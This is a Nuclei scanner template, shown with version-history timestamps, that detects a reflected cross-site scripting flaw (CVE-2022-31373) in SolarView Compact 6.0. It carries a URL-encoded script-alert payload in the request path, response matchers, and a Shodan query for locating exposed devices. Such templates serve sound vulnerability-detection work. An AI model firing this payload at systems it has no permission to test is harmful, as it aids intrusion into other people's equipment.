2022-07-06 19:29:39 +00:00
|
|
|
id: CVE-2022-31373
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: SolarView Compact 6.00 - Cross-Site Scripting(XSS)
|
|
|
|
author: ritikchaddha
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
SolarView Compact v6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Solar_AiConf.php.
|
|
|
|
reference:
|
|
|
|
- https://github.com/badboycxcc/SolarView_Compact_6.0_xss
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-31373
|
2022-07-09 16:46:49 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2022-31373
|
|
|
|
cwe-id: CWE-79
|
2022-07-06 19:29:39 +00:00
|
|
|
metadata:
|
|
|
|
shodan-query: http.html:"SolarView Compact"
|
2022-07-09 16:46:49 +00:00
|
|
|
verified: "true"
|
2022-07-06 19:29:39 +00:00
|
|
|
tags: cve,cve2022,xss,solarview
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-07-09 16:34:25 +00:00
|
|
|
part: body
|
2022-07-06 19:29:39 +00:00
|
|
|
words:
|
|
|
|
- '/Solar_AiConf.php/"><script>alert(document.domain)</script>'
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|